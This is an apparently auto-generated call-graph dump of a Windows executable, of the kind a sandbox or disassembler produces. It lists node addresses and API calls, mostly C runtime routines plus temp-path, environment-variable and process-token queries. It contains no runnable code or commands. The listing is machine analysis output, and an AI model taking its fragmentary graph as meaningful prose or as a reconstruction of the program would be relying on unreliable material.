__wsopen_s 25 API calls 17377->17378 17382 f65a5a 17377->17382 17379 f65a2c 17378->17379 17380 f65a34 SetFilePointerEx 17379->17380 17379->17382 17381 f65a4b GetFileSizeEx 17380->17381 17380->17382 17381->17382 17382->17352 17384 f65a8d 17383->17384 17385 f62f81 __fread_nolock 25 API calls 17384->17385 17388 f658ed 17384->17388 17386 f65aa8 17385->17386 17387 f6b43e __fread_nolock 25 API calls 17386->17387 17387->17388 17388->17356 17389 f6b494 17388->17389 17390 f67024 __dosmaperr 14 API calls 17389->17390 17391 f6b4b1 17390->17391 17392 f63b77 _free 14 API calls 17391->17392 17393 f6b4bb 17392->17393 17393->17356 17395 f65575 ___scrt_is_nonwritable_in_current_image 17394->17395 17396 f65595 17395->17396 17397 f6557d 17395->17397 17398 f65630 17396->17398 17403 f655c7 17396->17403 17399 f5e606 __dosmaperr 14 API calls 17397->17399 17400 f5e606 __dosmaperr 14 API calls 17398->17400 17401 f65582 17399->17401 17402 f65635 17400->17402 17404 f5e619 _free 14 API calls 17401->17404 17405 f5e619 _free 14 API calls 17402->17405 17422 f6082c EnterCriticalSection 17403->17422 17407 f6558a 17404->17407 17408 f6563d 17405->17408 17407->17372 17410 f63b33 __fread_nolock 25 API calls 17408->17410 17409 f655cd 17411 f655fe 17409->17411 17412 f655e9 17409->17412 17410->17407 17423 f6565b 17411->17423 17413 f5e619 _free 14 API calls 17412->17413 17415 f655ee 17413->17415 17417 f5e606 __dosmaperr 14 API calls 17415->17417 17416 f655f9 17467 f65628 17416->17467 17417->17416 17560 f64a3a 17419->17560 17422->17409 17424 f6567d 17423->17424 17438 f65699 17423->17438 17425 f65681 17424->17425 17427 f656d1 17424->17427 17426 f5e606 __dosmaperr 14 API calls 17425->17426 17428 f65686 17426->17428 17433 f656e7 17427->17433 17477 f64bdd 17427->17477 17429 f5e619 _free 14 API calls 17428->17429 17470 f65202 17433->17470 17438->17416 17559 f608e1 LeaveCriticalSection 17467->17559 17469 f6562e 17469->17407 17520 f6b43e 17470->17520 17529 f64b46 17477->17529 17538 f60aa8 17529->17538 17559->17469 17561 f64a46 ___scrt_is_nonwritable_in_current_image 17560->17561 17562 f64a66 17561->17562 17563 f64a4e 17561->17563 17565 f64b17 17562->17565 17569 f64a9b 17562->17569 17564 f5e606 __dosmaperr 14 API calls 17563->17564 17567 f64a53 17564->17567 17566 f5e606 __dosmaperr 14 API calls 17565->17566 17568 f64b1c 17566->17568 17570 f5e619 _free 14 API calls 17567->17570 17571 f5e619 _free 14 API calls 17568->17571 17585 f6082c EnterCriticalSection 17569->17585 17584 f64a5b 17570->17584 17573 f64b24 17571->17573 17575 f63b33 __fread_nolock 25 API calls 17573->17575 17574 f64aa1 17576 f64ac5 17574->17576 17577 f64ada 17574->17577 17575->17584 17578 f5e619 _free 14 API calls 17576->17578 17579 f64b46 __wsopen_s 27 API calls 17577->17579 17580 f64aca 17578->17580 17581 f64ad5 17579->17581 17582 f5e606 __dosmaperr 14 API calls 17580->17582 17586 f64b0f 17581->17586 17582->17581 17584->17372 17585->17574 17589 f608e1 LeaveCriticalSection 17586->17589 17588 f64b15 17588->17584 17589->17588 22506 f62932 22509 f628b9 22506->22509 22510 f628c5 ___scrt_is_nonwritable_in_current_image 22509->22510 22517 f68793 EnterCriticalSection 22510->22517 22512 f628fd 22518 f6291b 22512->22518 22513 f628cf 22513->22512 22515 f6ac46 _mbstowcs 14 API calls 22513->22515 22515->22513 22517->22513 22521 f687db LeaveCriticalSection 22518->22521 22520 f62909 22521->22520 22522 f5973b 22523 f59743 22522->22523 22539 f5f6a3 22523->22539 22525 f5974e 22546 f59c32 22525->22546 22527 f59ee1 4 API calls 22529 f597e5 22527->22529 22528 f59763 __RTC_Initialize 22537 f597c0 22528->22537 22552 f59dbf 22528->22552 22531 f5977c 22531->22537 22555 f59e76 InitializeSListHead 22531->22555 22533 f59792 22556 f59e85 22533->22556 22535 f597b5 22562 f62959 22535->22562 22537->22527 22538 f597dd 22537->22538 22540 f5f6d5 22539->22540 22541 f5f6b2 22539->22541 22540->22525 22541->22540 22542 f5e619 _free 14 API calls 22541->22542 22543 f5f6c5 22542->22543 22544 f63b33 __fread_nolock 25 API calls 22543->22544 22545 f5f6d0 22544->22545 22545->22525 22547 f59c42 22546->22547 22548 f59c3e 22546->22548 22549 f59ee1 4 API calls 22547->22549 22551 f59c4f ___scrt_release_startup_lock 22547->22551 22548->22528 22550 f59cb8 22549->22550 22551->22528 22569 f59d92 22552->22569 22555->22533 22604 f62e8c 22556->22604 22558 f59e9d 22558->22535 22559 f59e96 22559->22558 22560 f59ee1 4 API calls 22559->22560 22561 f59ea5 22560->22561 22570 f59da1 22569->22570 22571 f59da8 22569->22571 22575 f62cb0 22570->22575 22578 f62d1c 22571->22578 22574 f59da6 22574->22531 22576 f62d1c 28 API calls 22575->22576 22577 f62cc2 22576->22577 22577->22574 22581 f62a52 22578->22581 22582 f62a5e ___scrt_is_nonwritable_in_current_image 22581->22582 22589 f68793 EnterCriticalSection 22582->22589 22584 f62a6c 22590 f62aad 22584->22590 22586 f62a79 22600 f62aa1 22586->22600 22589->22584 22591 f62ac9 22590->22591 22596 f62b40 __dosmaperr 22590->22596 22592 f62b20 22591->22592 22593 f6ac96 28 API calls 22591->22593 22591->22596 22594 f6ac96 28 API calls 22592->22594 22592->22596 22595 f62b16 22593->22595 22597 f62b36 22594->22597 22599 f63b77 _free 14 API calls 22595->22599 22596->22586 22598 f63b77 _free 14 API calls 22597->22598 22598->22596 22599->22592 22603 f687db LeaveCriticalSection 22600->22603 22602 f62a8a 22602->22574 22603->22602 22605 f62eaa 22604->22605 22609 f62eca 22604->22609 22606 f5e619 _free 14 API calls 22605->22606 22607 f62ec0 22606->22607 22608 f63b33 __fread_nolock 25 API calls 22607->22608 22608->22609 22609->22559 18296 f648a5 18297 f648b2 18296->18297 18300 f648ca 18296->18300 18298 f5e619 _free 14 API calls 18297->18298 18299 f648b7 18298->18299 18301 f63b33 __fread_nolock 25 API calls 18299->18301 18302 f6b494 14 API calls 18300->18302 18304 f64929 18300->18304 18310 f648c2 18300->18310 18301->18310 18302->18304 18303 f62f81 __fread_nolock 25 API calls 18305 f64941 18303->18305 18304->18303 18316 f643e1 18305->18316 18308 f62f81 __fread_nolock 25 API calls 18309 f64975 18308->18309 18309->18310 18311 f62f81 __fread_nolock 25 API calls 18309->18311 18312 f64983 18311->18312 18312->18310 18313 f62f81 __fread_nolock 25 API calls 18312->18313 18314 f64993 18313->18314 18315 f62f81 __fread_nolock 25 API calls 18314->18315 18315->18310 18317 f643ed ___scrt_is_nonwritable_in_current_image 18316->18317 18318 f643f5 18317->18318 18319 f6440d 18317->18319 18320 f5e606 __dosmaperr 14 API calls 18318->18320 18321 f644ca 18319->18321 18325 f64443 18319->18325 18322 f643fa 18320->18322 18323 f5e606 __dosmaperr 14 API calls 18321->18323 18324 f5e619 _free 14 API calls 18322->18324 18326 f644cf 18323->18326 18345 f64402 18324->18345 18327 f64461 18325->18327 18328 f6444c 18325->18328 18329 f5e619 _free 14 API calls 18326->18329 18346 f6082c EnterCriticalSection 18327->18346 18331 f5e606 __dosmaperr 14 API calls 18328->18331 18330 f64459 18329->18330 18337 f63b33 __fread_nolock 25 API calls 18330->18337 18334 f64451 18331->18334 18333 f64467 18335 f64483 18333->18335 18336 f64498 18333->18336 18338 f5e619 _free 14 API calls 18334->18338 18339 f5e619 _free 14 API calls 18335->18339 18340 f644f5 __fread_nolock 37 API calls 18336->18340 18337->18345 18338->18330 18341 f64488 18339->18341 18342 f64493 18340->18342 18343 f5e606 __dosmaperr 14 API calls 18341->18343 18347 f644c2 18342->18347 18343->18342 18345->18308 18345->18310 18346->18333 18350 f608e1 LeaveCriticalSection 18347->18350 18349 f644c8 18349->18345 18350->18349 19103 f51420 19140 f55a40 19103->19140 19105 f5142e 19106 f51436 19105->19106 19149 f55d10 19105->19149 19109 f51465 19111 f521e0 53 API calls 19109->19111 19110 f51483 19112 f514ba 19110->19112 19113 f535c0 56 API calls 19110->19113 19115 f51475 19111->19115 19114 f5bd15 64 API calls 19112->19114 19116 f51498 19113->19116 19117 f514cf 19114->19117 19116->19112 19118 f514a4 19116->19118 19119 f514d6 19117->19119 19120 f514f1 19117->19120 19121 f52340 53 API calls 19118->19121 19122 f521e0 53 API calls 19119->19122 19123 f514f7 19120->19123 19124 f5150b 19120->19124 19133 f514af 19121->19133 19122->19133 19169 f51040 19123->19169 19127 f51522 19124->19127 19137 f5153d 19124->19137 19126 f515ed 19130 f5b65c 67 API calls 19126->19130 19129 f521e0 53 API calls 19127->19129 19128 f5b65c 67 API calls 19128->19126 19129->19133 19131 f51600 19130->19131 19132 f5e365 ___vcrt_freefls@4 14 API calls 19132->19133 19133->19126 19133->19128 19134 f5b91e __fread_nolock 39 API calls 19134->19137 19135 f515aa 19138 f521e0 53 API calls 19135->19138 19137->19134 19137->19135 19139 f515a6 19137->19139 19195 f5bf4f 19137->19195 19138->19139 19139->19132 19141 f55a4e 19140->19141 19142 f55a7f 19140->19142 19205 f51690 19141->19205 19142->19105 19150 f55d1a __wsopen_s 19149->19150 19151 f51a90 44 API calls 19150->19151 19152 f55d4f 19151->19152 19153 f55eca 19152->19153 19154 f51a90 44 API calls 19152->19154 19155 f596fa _ValidateLocalCookies 5 API calls 19153->19155 19157 f55d75 19154->19157 19156 f51458 19155->19156 19156->19109 19156->19110 19157->19153 19815 f5f145 19157->19815 19159 f55e79 19160 f56990 53 API calls 19159->19160 19161 f55e90 19160->19161 19162 f55eb8 19161->19162 19820 f523b0 19161->19820 19164 f535c0 56 API calls 19162->19164 19164->19153 19165 f55dac 19165->19153 19165->19159 19166 f5f145 38 API calls 19165->19166 19167 f56990 53 API calls 19165->19167 19168 f56830 52 API calls 19165->19168 19166->19165 19167->19165 19168->19165 19170 f5106c 19169->19170 19171 f51075 19170->19171 19172 f51094 19170->19172 19173 f52340 53 API calls 19171->19173 19175 f510a9 19172->19175 19176 f510c8 19172->19176 19174 f51088 19173->19174 19174->19133 19177 f521e0 53 API calls 19175->19177 19178 f510db 19176->19178 19180 f510fa 19176->19180 19192 f510c0 19177->19192 19179 f521e0 53 API calls 19178->19179 19179->19192 19182 f5b91e __fread_nolock 39 API calls 19180->19182 19181 f5e365 ___vcrt_freefls@4 14 API calls 19183 f51203 19181->19183 19184 f5113d 19182->19184 19185 f5e365 ___vcrt_freefls@4 14 API calls 19183->19185 19187 f5b70c 25 API calls 19184->19187 19184->19192 19188 f51153 19187->19188 19188->19192 19192->19181 19196 f5bf5d 19195->19196 19197 f5bf7a 19195->19197 19196->19197 19198 f5bf7e 19196->19198 19199 f5bf6a 19196->19199 19197->19137 19844 f5bd30 19198->19844 19200 f5e619 _free 14 API calls 19199->19200 19202 f5bf6f 19200->19202 19204 f63b33 __fread_nolock 25 API calls 19202->19204 19204->19197 19206 f516a4 19205->19206 19207 f52340 53 API calls 19206->19207 19208 f516d6 19206->19208 19207->19208 19209 f55a90 19208->19209 19210 f55a9a __wsopen_s 19209->19210 19211 f55b0f 19210->19211 19265 f55c60 19210->19265 19212 f55b13 GetTempPathW GetCurrentProcessId 19211->19212 19327 f521b0 19212->19327 19215 f55acc 19280 f55780 19215->19280 19217 f55ad4 19264 f55b05 19217->19264 19221 f596fa _ValidateLocalCookies 5 API calls 19223 f55a66 19221->19223 19223->19142 19225 f55bcf 19228 f56a30 53 API calls 19225->19228 19226 f55b3a 19226->19225 19229 f5e365 ___vcrt_freefls@4 14 API calls 19226->19229 19234 f55b6d 19226->19234 19331 f6148d 19226->19331 19334 f56830 19226->19334 19231 f55bde 19228->19231 19229->19226 19233 f5e365 ___vcrt_freefls@4 14 API calls 19231->19233 19236 f56990 53 API calls 19234->19236 19234->19264 19238 f55b7f 19236->19238 19239 f55bb4 SetEnvironmentVariableW 19238->19239 19240 f55b83 19238->19240 19264->19221 19266 f55c6a __wsopen_s 19265->19266 19267 f56990 53 API calls 19266->19267 19268 f55c89 GetEnvironmentVariableW 19267->19268 19269 f55cf0 19268->19269 19270 f55ca0 ExpandEnvironmentStringsW 19268->19270 19272 f596fa _ValidateLocalCookies 5 API calls 19269->19272 19271 f56a30 53 API calls 19270->19271 19274 f55cc6 19271->19274 19273 f55d00 19272->19273 19273->19215 19274->19269 19275 f55cd2 19274->19275 19356 f62f2d 19275->19356 19278 f596fa _ValidateLocalCookies 5 API calls 19279 f55ce9 19278->19279 19279->19215 19281 f5578a __wsopen_s 19280->19281 19282 f56990 53 API calls 19281->19282 19283 f557aa 19282->19283 19284 f557b3 19283->19284 19285 f557d8 ExpandEnvironmentStringsW 19283->19285 19287 f52340 53 API calls 19284->19287 19286 f5e365 ___vcrt_freefls@4 14 API calls 19285->19286 19288 f557f2 19286->19288 19289 f557bd 19287->19289 19290 f5581f 19288->19290 19291 f557f9 19288->19291 19292 f596fa _ValidateLocalCookies 5 API calls 19289->19292 19363 f567d0 19290->19363 19293 f52340 53 API calls 19291->19293 19295 f557d1 19292->19295 19296 f55803 19293->19296 19295->19217 19328 f521c8 19327->19328 19443 f5e336 19328->19443 19638 f610f9 19331->19638 19809 f59710 19334->19809 19337 f5687f GetTokenInformation 19338 f568db 19357 f62f3a 19356->19357 19360 f55cd8 19356->19360 19358 f62fa8 25 API calls 19357->19358 19357->19360 19359 f62f63 19358->19359 19359->19360 19361 f63b43 __wsopen_s 11 API calls 19359->19361 19360->19278 19362 f62f80 19361->19362 19364 f567e0 19363->19364 19364->19364 19446 f5c130 19443->19446 19447 f5c170 19446->19447 19448 f5c158 19446->19448 19447->19448 19449 f5c178 19447->19449 19450 f5e619 _free 14 API calls 19448->19450 19451 f5c80e _mbstowcs 37 API calls 19449->19451 19452 f5c15d 19450->19452 19455 f5c188 19451->19455 19453 f63b33 __fread_nolock 25 API calls 19452->19453 19460 f5c168 19453->19460 19454 f596fa _ValidateLocalCookies 5 API calls 19456 f521d2 19454->19456 19461 f5cc23 19455->19461 19456->19226 19458 f5c891 14 API calls 19458->19460 19460->19454 19462 f5e044 25 API calls 19461->19462 19468 f5cc34 19462->19468 19463 f5c20f 19463->19458 19464 f5cc43 19465 f5e619 _free 14 API calls 19464->19465 19466 f5cc48 19465->19466 19467 f63b33 __fread_nolock 25 API calls 19466->19467 19467->19463 19468->19463 19468->19464 19474 f5cdd8 19468->19474 19481 f5d66d 19468->19481 19486 f5cec6 19468->19486 19491 f5d03b 19468->19491 19522 f5d3e5 19468->19522 19476 f5cddd 19474->19476 19475 f5cdf4 19475->19468 19476->19475 19477 f5e619 _free 14 API calls 19476->19477 19478 f5cde6 19477->19478 19479 f63b33 __fread_nolock 25 API calls 19478->19479 19482 f5d677 19481->19482 19483 f5d67e 19481->19483 19546 f5ca99 19482->19546 19483->19468 19487 f5ced7 19486->19487 19488 f5ced0 19486->19488 19487->19468 19489 f5ca99 38 API calls 19488->19489 19490 f5ced6 19489->19490 19490->19468 19492 f5d047 19491->19492 19493 f5d062 19491->19493 19495 f5d477 19492->19495 19496 f5d40c 19492->19496 19497 f5d094 19492->19497 19494 f5e619 _free 14 API calls 19493->19494 19493->19497 19498 f5d07f 19494->19498 19500 f5d4bd 19495->19500 19501 f5d47e 19495->19501 19510 f5d44e 19495->19510 19506 f5d418 19496->19506 19496->19510 19497->19468 19499 f63b33 __fread_nolock 25 API calls 19498->19499 19599 f5df01 19500->19599 19504 f5d425 19501->19504 19505 f5d483 19501->19505 19520 f5d433 19504->19520 19521 f5d447 19504->19521 19505->19510 19506->19504 19509 f5d45e 19506->19509 19506->19520 19509->19521 19510->19520 19510->19521 19584 f5dce2 19510->19584 19520->19521 19523 f5d477 19522->19523 19524 f5d40c 19522->19524 19525 f5d44e 19523->19525 19527 f5d4bd 19523->19527 19528 f5d47e 19523->19528 19524->19525 19526 f5d418 19524->19526 19532 f5dce2 26 API calls 19525->19532 19543 f5d433 19525->19543 19545 f5d447 19525->19545 19531 f5d45e 19526->19531 19535 f5d425 19526->19535 19526->19543 19530 f5df01 26 API calls 19527->19530 19529 f5d483 19528->19529 19528->19535 19529->19525 19534 f5d488 19529->19534 19530->19543 19540 f5dafb 38 API calls 19531->19540 19531->19545 19532->19543 19533 f5d901 40 API calls 19533->19543 19535->19533 19535->19543 19535->19545 19538 f596fa _ValidateLocalCookies 5 API calls 19540->19543 19544 f5e18b 38 API calls 19543->19544 19543->19545 19544->19545 19545->19538 19547 f5cab0 19546->19547 19548 f5caab 19546->19548 19554 f65c35 19547->19554 19549 f5e619 _free 14 API calls 19548->19549 19549->19547 19657 f612f7 19638->19657 19710 f69458 19657->19710 19810 f5683a GetCurrentProcess OpenProcessToken 19809->19810 19810->19337 19810->19338 19816 f66254 _mbstowcs 37 API calls 19815->19816 19817 f5f14f 19816->19817 19828 f67df9 19817->19828 19821 f523e4 19820->19821 19822 f5e312 44 API calls 19821->19822 19823 f523f2 19822->19823 19829 f67e1f 19828->19829 19830 f67edf 19829->19830 19833 f67e30 19829->19833 19836 f59aa8 19830->19836 19834 f596fa _ValidateLocalCookies 5 API calls 19833->19834 19835 f5f15e 19834->19835 19835->19165 19839 f59ab4 IsProcessorFeaturePresent 19836->19839 19840 f59ac9 19839->19840 19843 f59986 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19840->19843 19842 f59ab2 19843->19842 19845 f5bd3c ___scrt_is_nonwritable_in_current_image 19844->19845 19852 f5e52c EnterCriticalSection 19845->19852 19847 f5bd4a 19853 f5bd8b 19847->19853 19852->19847 22027 f620a0 22028 f620a9 22027->22028 22031 f620bf 22027->22031 22028->22031 22033 f620f8 22028->22033 22030 f620b6 22030->22031 22046 f623a5 22030->22046 22034 f62104 22033->22034 22035 f62101 22033->22035 22054 f6a1a7 22034->22054 22035->22030 22040 f62116 22042 f63b77 _free 14 API calls 22040->22042 22044 f62145 22042->22044 22044->22030 22045 f63b77 _free 14 API calls 22045->22040 22047 f62416 22046->22047 22052 f623b4 22046->22052 22047->22031 22048 f680d7 WideCharToMultiByte __wsopen_s 22048->22052 22049 f67024 __dosmaperr 14 API calls 22049->22052 22050 f6241a 22051 f63b77 _free 14 API calls 22050->22051 22051->22047 22052->22047 22052->22048 22052->22049 22052->22050 22053 f63b77 _free 14 API calls 22052->22053 22053->22052 22055 f6a1b0 22054->22055 22056 f6210b 22054->22056 22089 f66311 22055->22089 22060 f6a42c GetEnvironmentStringsW 22056->22060 22061 f6a443 22060->22061 22062 f6a499 22060->22062 22065 f680d7 __wsopen_s WideCharToMultiByte 22061->22065 22063 f6a4a2 FreeEnvironmentStringsW 22062->22063 22064 f62110 22062->22064 22063->22064 22064->22040 22072 f62199 22064->22072 22066 f6a45c 22065->22066 22066->22062 22067 f65ba2 __fread_nolock 15 API calls 22066->22067 22068 f6a46c 22067->22068 22069 f6a484 22068->22069 22070 f680d7 __wsopen_s WideCharToMultiByte 22068->22070 22071 f63b77 _free 14 API calls 22069->22071 22070->22069 22071->22062 22073 f621ae 22072->22073 22074 f67024 __dosmaperr 14 API calls 22073->22074 22084 f621d5 22074->22084 22075 f6223a 22076 f63b77 _free 14 API calls 22075->22076 22077 f62121 22076->22077 22077->22045 22078 f67024 __dosmaperr 14 API calls 22078->22084 22079 f6223c 22080 f62376 14 API calls 22079->22080 22082 f62242 22080->22082 22081 f62fa8 25 API calls 22081->22084 22085 f63b77 _free 14 API calls 22082->22085 22083 f6225c 22086 f63b43 __wsopen_s 11 API calls 22083->22086 22084->22075 22084->22078 22084->22079 22084->22081 22084->22083 22087 f63b77 _free 14 API calls 22084->22087 22085->22075 22088 f62268 22086->22088 22087->22084 22090 f66322 22089->22090 22091 f6631c 22089->22091 22093 f673ac __dosmaperr 6 API calls 22090->22093 22113 f66328 22090->22113 22092 f6736d __dosmaperr 6 API calls 22091->22092 22092->22090 22094 f6633c 22093->22094 22096 f67024 __dosmaperr 14 API calls 22094->22096 22094->22113 22095 f63002 _mbstowcs 37 API calls 22097 f663aa 22095->22097 22098 f6634c 22096->22098 22100 f66354 22098->22100 22101 f66369 22098->22101 22099 f663a1 22114 f69ff3 22099->22114 22103 f673ac __dosmaperr 6 API calls 22100->22103 22102 f673ac __dosmaperr 6 API calls 22101->22102 22105 f66375 22102->22105 22104 f66360 22103->22104 22108 f63b77 _free 14 API calls 22104->22108 22106 f66388 22105->22106 22107 f66379 22105->22107 22110 f66082 __dosmaperr 14 API calls 22106->22110 22109 f673ac __dosmaperr 6 API calls 22107->22109 22108->22113 22109->22104 22111 f66393 22110->22111 22112 f63b77 _free 14 API calls 22111->22112 22112->22113 22113->22095 22113->22099 22115 f6a107 _mbstowcs 37 API calls 22114->22115 22116 f6a006 22115->22116 22133 f69d9d 22116->22133 22119 f6a01f 22119->22056 22120 f65ba2 __fread_nolock 15 API calls 22121 f6a030 22120->22121 22132 f6a062 22121->22132 22140 f6a202 22121->22140 22124 f63b77 _free 14 API calls 22126 f6a070 22124->22126 22126->22056 22132->22124 22134 f5c80e _mbstowcs 37 API calls 22133->22134 22135 f69daf 22134->22135 22136 f69dd0 22135->22136 22137 f69dbe GetOEMCP 22135->22137 22138 f69dd5 GetACP 22136->22138 22139 f69de7 22136->22139 22137->22139 22138->22139 22139->22119 22139->22120 22141 f69d9d 39 API calls 22140->22141 22142 f6a222 22141->22142 22144 f6a25c IsValidCodePage 22142->22144 22148 f6a298 __fread_nolock 22142->22148 22143 f596fa _ValidateLocalCookies 5 API calls 22145 f6a055 22143->22145 22146 f6a26e 22144->22146 22144->22148 22147 f6a29d GetCPInfo 22146->22147 22150 f6a277 __fread_nolock 22146->22150 22147->22148 22147->22150 22148->22143 21401 f67a2f 21402 f67bd2 21401->21402 21405 f67a59 21401->21405 21403 f5e619 _free 14 API calls 21402->21403 21404 f67bbd 21403->21404 21406 f596fa _ValidateLocalCookies 5 API calls 21404->21406 21405->21402 21408 f67aa4 21405->21408 21407 f67bef 21406->21407 21422 f6dbb4 21408->21422 21412 f67ad8 21413 f67bf1 21412->21413 21437 f6d299 21412->21437 21414 f63b43 __wsopen_s 11 API calls 21413->21414 21417 f67bfd 21414->21417 21416 f67aea 21416->21413 21444 f6d2c5 21416->21444 21419 f67afc 21419->21413 21420 f67b05 21419->21420 21420->21404 21451 f6dc11 21420->21451 21423 f6dbc0 ___scrt_is_nonwritable_in_current_image 21422->21423 21424 f67ac4 21423->21424 21459 f68793 EnterCriticalSection 21423->21459 21430 f6d26d 21424->21430 21426 f6dbd1 21427 f6dbe5 21426->21427 21460 f6da8d 21426->21460 21478 f6dc08 21427->21478 21431 f6d28e 21430->21431 21432 f6d279 21430->21432 21431->21412 21433 f5e619 _free 14 API calls 21432->21433 21434 f6d27e 21433->21434 21435 f63b33 __fread_nolock 25 API calls 21434->21435 21436 f6d289 21435->21436 21436->21412 21438 f6d2a5 21437->21438 21439 f6d2ba 21437->21439 21440 f5e619 _free 14 API calls 21438->21440 21439->21416 21441 f6d2aa 21440->21441 21442 f63b33 __fread_nolock 25 API calls 21441->21442 21443 f6d2b5 21442->21443 21443->21416 21445 f6d2e6 21444->21445 21446 f6d2d1 21444->21446 21445->21419 21447 f5e619 _free 14 API calls 21446->21447 21448 f6d2d6 21447->21448 21449 f63b33 __fread_nolock 25 API calls 21448->21449 21450 f6d2e1 21449->21450 21450->21419 21452 f6dc1d ___scrt_is_nonwritable_in_current_image 21451->21452 21685 f68793 EnterCriticalSection 21452->21685 21454 f6dc28 21686 f6d2f1 21454->21686 21459->21426 21461 f6dad9 21460->21461 21462 f65ba2 __fread_nolock 15 API calls 21461->21462 21477 f6dae0 21461->21477 21470 f6daff 21462->21470 21463 f6db57 21545 f6d933 21463->21545 21464 f6db4e 21481 f6d692 21464->21481 21466 f6db54 21469 f63b77 _free 14 API calls 21466->21469 21467 f6db06 21472 f63b77 _free 14 API calls 21467->21472 21471 f6db62 21469->21471 21470->21467 21473 f6db2e 21470->21473 21474 f596fa _ValidateLocalCookies 5 API calls 21471->21474 21472->21477 21475 f63b77 _free 14 API calls 21473->21475 21476 f6db70 21474->21476 21475->21477 21476->21427 21477->21463 21477->21464 21684 f687db LeaveCriticalSection 21478->21684 21480 f6dc0f 21480->21424 21482 f6d6a2 21481->21482 21483 f6d2c5 25 API calls 21482->21483 21484 f6d6c1 21483->21484 21485 f6d26d 25 API calls 21484->21485 21507 f6d926 21484->21507 21488 f6d6d3 21485->21488 21486 f63b43 __wsopen_s 11 API calls 21487 f6d932 21486->21487 21492 f6d2c5 25 API calls 21487->21492 21489 f65ba2 __fread_nolock 15 API calls 21488->21489 21490 f6d920 21488->21490 21488->21507 21491 f6d73e 21489->21491 21490->21466 21493 f6d91a 21491->21493 21496 f63b77 _free 14 API calls 21491->21496 21494 f6d960 21492->21494 21495 f63b77 _free 14 API calls 21493->21495 21497 f6da82 21494->21497 21499 f6d26d 25 API calls 21494->21499 21495->21490 21501 f6d754 21496->21501 21498 f63b43 __wsopen_s 11 API calls 21497->21498 21506 f6da8c 21498->21506 21500 f6d972 21499->21500 21500->21497 21502 f6d299 25 API calls 21500->21502 21501->21501 21503 f68911 25 API calls 21501->21503 21505 f6d984 21502->21505 21504 f6d782 21503->21504 21504->21507 21521 f6d78d __fread_nolock 21504->21521 21505->21497 21508 f6d98d 21505->21508 21511 f65ba2 __fread_nolock 15 API calls 21506->21511 21525 f6dae0 21506->21525 21507->21486 21509 f63b77 _free 14 API calls 21508->21509 21519 f6daff 21511->21519 21512 f6db57 21514 f6d933 42 API calls 21512->21514 21513 f6db4e 21517 f6d692 42 API calls 21513->21517 21516 f6db06 21519->21516 21523 f6db2e 21519->21523 21582 f6d64b 21521->21582 21525->21512 21525->21513 21546 f6d943 21545->21546 21547 f6d2c5 25 API calls 21546->21547 21548 f6d960 21547->21548 21549 f6da82 21548->21549 21551 f6d26d 25 API calls 21548->21551 21550 f63b43 __wsopen_s 11 API calls 21549->21550 21553 f6da8c 21550->21553 21552 f6d972 21551->21552 21552->21549 21554 f6d299 25 API calls 21552->21554 21559 f65ba2 __fread_nolock 15 API calls 21553->21559 21572 f6dae0 21553->21572 21555 f6d984 21554->21555 21555->21549 21556 f6d98d 21555->21556 21557 f63b77 _free 14 API calls 21556->21557 21558 f6d998 GetTimeZoneInformation 21557->21558 21575 f6da5c 21558->21575 21576 f6d9b4 __fread_nolock 21558->21576 21567 f6daff 21559->21567 21560 f6db57 21562 f6d933 42 API calls 21560->21562 21561 f6db4e 21565 f6d692 42 API calls 21561->21565 21563 f6db54 21562->21563 21566 f63b77 _free 14 API calls 21563->21566 21564 f6db06 21569 f63b77 _free 14 API calls 21564->21569 21565->21563 21568 f6db62 21566->21568 21567->21564 21570 f6db2e 21567->21570 21571 f596fa _ValidateLocalCookies 5 API calls 21568->21571 21569->21572 21573 f63b77 _free 14 API calls 21570->21573 21574 f6db70 21571->21574 21572->21560 21572->21561 21573->21572 21574->21466 21575->21466 21577 f6a531 37 API calls 21576->21577 21578 f6da37 21577->21578 21579 f6db72 42 API calls 21578->21579 21674 f69768 21582->21674 21684->21480 21685->21454 21687 f6d26d 25 API calls 21686->21687 21688 f6d309 21687->21688 21689 f6d312 21688->21689 21690 f6d500 21688->21690 21693 f6d342 21689->21693 21694 f6d43c 21689->21694 21699 f6d437 21689->21699 21691 f63b43 __wsopen_s 11 API calls 21690->21691 21692 f6d50a 21691->21692 21705 f6d50b 21693->21705 21695 f6d50b 25 API calls 21694->21695 21702 f6dc5c 21699->21702 22242 f60b95 22243 f60ba1 ___scrt_is_nonwritable_in_current_image 22242->22243 22248 f68793 EnterCriticalSection 22243->22248 22245 f60bb0 22249 f60c10 22245->22249 22248->22245 22252 f687db LeaveCriticalSection 22249->22252 22251 f60c02 22252->22251 22644 f6611b 22645 f66126 22644->22645 22646 f66136 22644->22646 22650 f6613c 22645->22650 22651 f66151 22650->22651 22652 f66157 22650->22652 22653 f63b77 _free 14 API calls 22651->22653 22654 f63b77 _free 14 API calls 22652->22654 22653->22652 22655 f66163 22654->22655 22656 f63b77 _free 14 API calls 22655->22656 22657 f6616e 22656->22657 22658 f63b77 _free 14 API calls 22657->22658 22659 f66179 22658->22659 22660 f63b77 _free 14 API calls 22659->22660 22661 f66184 22660->22661 22662 f63b77 _free 14 API calls 22661->22662 22663 f6618f 22662->22663 22664 f63b77 _free 14 API calls 22663->22664 22665 f6619a 22664->22665 22666 f63b77 _free 14 API calls 22665->22666 22667 f661a5 22666->22667 22668 f63b77 _free 14 API calls 22667->22668 22669 f661b0 22668->22669 22670 f63b77 _free 14 API calls 22669->22670 22671 f661be 22670->22671 22676 f65f68 22671->22676 22677 f65f74 ___scrt_is_nonwritable_in_current_image 22676->22677 22692 f68793 EnterCriticalSection 22677->22692 19886 f59800 19887 f5980c ___scrt_is_nonwritable_in_current_image 19886->19887 19912 f59bf9 19887->19912 19889 f59966 19950 f59ee1 IsProcessorFeaturePresent 19889->19950 19890 f59813 19890->19889 19900 f5983d ___scrt_is_nonwritable_in_current_image _mbstowcs ___scrt_release_startup_lock 19890->19900 19892 f5996d 19930 f628a3 19892->19930 19895 f62867 _mbstowcs 23 API calls 19896 f5997b 19895->19896 19897 f5985c 19898 f598dd 19920 f59ffc 19898->19920 19900->19897 19900->19898 19933 f6287d 19900->19933 19901 f598e3 19924 f51000 19901->19924 19913 f59c02 19912->19913 19954 f5a185 IsProcessorFeaturePresent 19913->19954 19917 f59c13 19919 f59c17 19917->19919 19964 f5af3d 19917->19964 19919->19890 19921 f5a8f0 __fread_nolock 19920->19921 19922 f5a00f GetStartupInfoW 19921->19922 19923 f5a022 19922->19923 19923->19901 19925 f51006 19924->19925 20026 f566b0 19925->20026 19931 f62741 _mbstowcs 23 API calls 19930->19931 19932 f59973 19931->19932 19932->19895 19934 f62893 __dosmaperr 